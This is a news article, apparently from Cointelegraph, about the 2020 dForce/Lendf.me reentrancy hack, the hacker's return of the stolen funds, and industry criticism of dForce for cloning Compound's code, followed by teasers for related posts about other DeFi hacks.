DForce Hacker Returns Stolen Money as Criticism of the Project Continues

Published at: April 22, 2020

The hacker who stole $25 million in crypto on April 19 from decentralized finance, or DeFi, protocol, dForce, has since returned the money. Most signs indicate that this was due to the hacker accidentally leaking data which could have led to their identity being discovered. dForce has not issued any clarifying statements, despite mounting criticism of their security practices. 

Etherscan data shows that on April 21, the hacker emptied all tokens obtained from the hack into an address identified as “Lendf.me admin.” Lendf.me is the name of the specific platform part of the dForce network.

Mindao Yang, the founder of dForce, confirmed that the funds were returned and that they will be redistributed to their rightful owners.

But while a happy ending for the victims of the attack appears to be in sight, many community members are raising their voice to criticize the project.

A clone of another platform

In the DeFi community, dForce is considered by many to be a clone of another, better known platform called Compound.

Anthony Sassano, co-founder of Ethhub, posted an ironic tweet after the events:

“Now that the hacker has returned the funds to dForce it's time for dForce to return Compound's code.”

Taylor Monahan, CEO of Ethereum wallet company, mycrypto.com, told Cointelegraph a similar story:

“dForce is apparently a pretty basic clone of the older Compound contracts, except that they enabled some tokens that Compound did not.”

Criticism from Brian Kerr, CEO of multi-platform DeFi project, Kava Labs, was even harsher:

“The dForce team copied code they did not understand from Compound, illegally deployed it as their own while changing a few parts without realizing the security issues, and then they heavily marketed it to the world without first running very basic audits.”

As Monahan explained, dForce enabled the ERC-777 token standard which allowed for the “reentrancy attack” to occur. She stressed that it is a feature, not a bug of the standard. “However, if used in certain systems, it becomes bug in that system,” she added.

A well known issue

The reentrancy attack is not new. A similar issue led to the infamous DAO hack in 2016.

In July 2019, this issue was also identified in the Uniswap decentralized exchange. Monahan said that this “feature/bug was exploited two days previous in another system.” This was in reference to Uniswap itself, which actually suffered a $300,000 loss just the day before on April 18. The culprit was the same imBTC token responsible for the dForce hack. It was added by Uniswap community members, despite warnings to the contrary.

The combination of these factors led to a summary judgement from Monahan:

“The ways all of this indicates that dForce is incompetent is that they 1) didn't write their own code but re-used someone else's code in a way prohibit by that code's license and 2) failed to address an issue that came to light once again in very recent days.”

Kerr was more candid:

“I don’t like to say bad things about others usually, hacks can happen to any team, but the dForce incident is particularly bad. The fault is both on the dForce team and the users.  Dforce didn’t understand what they were doing and marketed an unsafe product. The users didn’t do their own due diligence on the team or the code base to make sure it’s safe.”

DForce is seeking to rectify these issues. Yang took personal responsibility for failing to foresee the hack, and the company is completely disabling the vulnerable smart contracts.

While the company has yet to provide its own official version of the story, it seems that its users were lucky in their misfortune: the hacker did not know how to cover his tracks. 

The event was briefly the largest DeFi hack in its short history. Given its simplicity, it shows that the security practices utilized by the space still need to mature.

Tags
Related Posts
Finance Redefined: One hack to bring down a whole market, Feb 10–17
Finance Redefined is Cointelegraph's DeFi-centric newsletter, delivered to subscribers every Wednesday. The Alpha Homora and Cream Finance hack has made a gigantic mark in the DeFi space this week. It is the largest single hack in DeFi history at $37 million in funds stolen. It is also one of the most complex, apparently leveraging several honest-to-God vulnerabilities in Alpha Homora. A few missing input checks in very specialized conditions allowed the hacker to abuse Alpha Homora’s privilege of borrowing an unlimited amount of funds from Cream Finance’s Iron Bank. Flash loans were of course involved, but unlike some previous hacks …
Technology / Feb. 18, 2021
Yearn.Finance puts expanded treasury to use by repaying victims of $11M hack
Major decentralized finance protocol Yearn.Finance (YFI) has restored its yDAI vault in the aftermath of a $11 million exploit by hackers. Yearn announced Tuesday that they opened a Maker vault with YFI tokens from the treasury and minted 9.7 million DAI tokens from the vault to keep the yDAI vault intact. Using borrowed money allows the project to reimburse users without taking a hit to the treasury, either due to possible YFI appreciation or by gradually repaying the debt with protocol revenue. The team said that this is a one-off occurrence, as they expect users to hedge their own risks …
Technology / Feb. 9, 2021
Finance Redefined: You get hacked, they get hacked, everyone gets hacked, Nov. 11–18
If people actually used insurance against hacks, this week would definitely have bankrupted a great many insurers. In the span of one week, a total of four flash loan-enabled exploits were registered (one actually happened the week before, but wasn’t noticed until later). We have, in order, Cheese Bank with a $3.3 million theft, Akropolis with its $2 million loss, Value DeFi with a whopping $6 million exploit and finally Origin Protocol’s loss of $7 million. In total, the hackers stole $18.3 million, which admittedly, is not that much — less than the single October exploit of Harvest Finance. As …
Technology / Nov. 19, 2020
Jump Crypto replenishes funds from $320M Wormhole hack in largest-ever DeFi 'bailout'
On Thursday, Jump Crypto, a crypto venture capital firm that owns Certus One, the developer of the Wormhole token bridge, announced it had deposited 120 thousand Ether (ETH) into a Solana-Ethereum bridge that suffered a devastating exploit. The day prior, hackers fraudulently minted 120 thousand wrapped Ether (wETH) worth $321 million on the Solana (SOL) platform, then redeemed 93,750 wETH for ETH on the Ethereum network while swapping the rest for other altcoins on the Solana network. The cross-chain ETH-wETH is supposed to have an exchange ratio of 1:1 against one another. Therefore, unauthorized minting of wETH leads to significant …
Technology / Feb. 3, 2022
Top 7 cybersecurity jobs in high demand
In today’s digital age, cybersecurity has become a critical aspect of almost every business. Cyber threats are increasing daily, and businesses must take proactive measures to protect their networks and data. As a result, the demand for cybersecurity professionals has skyrocketed. Little Friday humour #meme #cybersecurity @hackurityio pic.twitter.com/MArEpCh03k — Harold De Vries (@devries_harold) February 17, 2023 In this article, we will discuss the top seven cybersecurity jobs that are in high demand. Cybersecurity analyst A cybersecurity analyst is responsible for identifying and mitigating cyber threats to an organization’s network and data. They examine system logs and network traffic to find …
Technology / Feb. 26, 2023